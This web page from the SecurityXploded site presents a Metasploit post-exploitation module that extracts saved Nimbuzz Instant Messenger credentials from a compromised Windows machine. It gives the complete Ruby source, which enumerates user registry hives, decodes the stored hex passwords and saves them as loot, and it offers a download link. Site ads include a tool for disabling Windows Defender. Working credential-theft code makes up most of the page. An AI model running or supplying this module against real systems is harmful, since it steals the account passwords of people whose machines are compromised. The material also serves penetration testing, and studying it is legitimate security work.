Today's Deals

Metasploit - Nimbuzz Instant Messenger Password Extractor Author: Silent Dream        See Also Index of all Password Tools Index of all Password Secrets Articles Metasploit - Trillian Messenger Password Extractor BrowserPasswordDecryptor - All in one Browser Password Recovery Software     Module Description This module extracts the account passwords saved by Nimbuzz Instant Messenger. It traverses through registry entries stored by Nimbuzz and automatically decodes & dumps all the account passwords.       Module Code Here is the complete Metasploit code for this module.   ## # $Id: enum_nimbuzz_pwds.rb 13399 2011-07-29 01:29:15Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'msf/core/post/windows/registry' class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report def initialize(info={}) super( update_info( info, 'Name' => 'Nimbuzz Instant Messenger Password Extractor', 'Description' => %q{ This module extracts the account passwords saved by Nimbuzz Instant Messenger in hex format. }, 'License' => MSF_LICENSE, 'Author' => [ 'sil3ntdre4m <sil3ntdre4m[at]gmail.com>', 'SecurityXploded Team', #www.SecurityXploded.com ], 'Version' => '$Revision: 13399 $', 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] )) end def run creds = Rex::Ui::Text::Table.new( 'Header' => 'Nimbuzz Instant Messenger Credentials', 'Ident' => 1, 'Columns' => [ 'Username', 'Password' ] ) registry_enumkeys('HKU').each do |k| next unless k.include? "S-1-5-21" next if k.include? "_Classes" print_status("Looking at Key #{k}") if datastore['VERBOSE'] subkeys = registry_enumkeys("HKU\\#{k}\\Software\\Nimbuzz\\") if subkeys == nil or subkeys == "" print_status ("Nimbuzz Instant Messenger not installed for this user.") return end user = registry_getvaldata("HKU\\#{k}\\Software\\Nimbuzz\\PCClient\\Application\\", "Username") hpass = registry_getvaldata("HKU\\#{k}\\Software\\Nimbuzz\\PCClient\\Application\\", "Password") next if hpass == nil or hpass == "" hpass =~ /.{11}(.*)./ decpass = [$1].pack("H*") print_good("User=#{user}, Password=#{decpass}") creds << [user, decpass] end print_status("Storing data...") path = store_loot( 'nimbuzz.user.creds', 'text/plain', session, creds, 'nimbuzz_user_creds.txt', 'Nimbuzz User Credentials' ) print_status("Nimbuzz user credentials saved in: #{path}") end end     Download Here is the Metasploit download link to this module.   Download     References Source : Metasploit modules / post / windows / gather / enum_nimbuzz_pwds.rb   See Also Index of all Password Tools Index of all Password Secrets Articles Metasploit - Trillian Messenger Password Extractor BrowserPasswordDecryptor - All in one Browser Password Recovery Software               100% FREE Today »» FREE Gift for You (worth $29.95) Email Password Recovery Pro Download Now New Free Software »» Disable Windows Defender Download Now Top 10 Free Downloads »» WiFi Password Decryptor Asterisk Password Spy Product Key Decryptor Browser Password Decryptor Mail Password Decryptor FTP Password Decryptor Facebook Password Decryptor Google Password Decryptor Website Blocker WiFi Network Monitor Top 10 Pro Softwares »» Social Password Recovery Pro All-In-One Key Finder Pro All-In-One Password Recovery Pro WiFi Password Recovery Pro Google Password Recovery Pro Email Password Recovery Pro Asterisk Password Recovery Pro Browser Password Recovery Pro Website Blocker Pro Windows Vault Password Recovery Pro How to Recover Passwords »» How to Recover Facebook Password How to Recover Gmail Password How to Recover Instagram Password How to Recover Outlook Password How to Recover WiFi Password Latest Releases »» Disable Windows Defender v1.0 Chrome Password Decryptor v15.0 Browser Password Decryptor v18.0 Remote DLL v6.0 VirusTotal Scanner v8.0 All-in-one Password Decoder v9.0 eM Client Password Decryptor v3.0 SmartFTP Password Decryptor v7.0 Top Research Articles »» Password Secrets of Popular Windows Applications Penetration Testing with Metasploit Framework Reference Guide - Reversing & Malware Analysis Training Exposing Wireless Password Secrets & Techniques Hidden Rootkit Process Detection Our Enterprise Company www.XenArmor.com Testimonials »» "I have found 'SecurityXploded' tools to be an invaluable asset..." James Cadden, East Lansdowne Police, Pennsylvania, USA Awards »» Awards for our softwares from leading Download Sites

About SX About Company Awards Testimonials Contact Security Tools Enterprise Softwares Free Password Tools Wi-Fi Security Tools Anti Spyware Tools Windows Security Tools Resources Password Articles Security Articles Security Videos Metasploit Modules Software Pad Files Our Security Group XenArmor XenArmor Blog SecurityTrainings Security Blog SecurityXploded SecurityXploded - SAFE & SECURE Site Certification

SecurityXploded © 2007-2025, All rights reserved. Division of XenArmor Security Pvt Ltd. Sponsored Post  |  Advertise  |  Privacy  |  Terms  |  About  |  Contact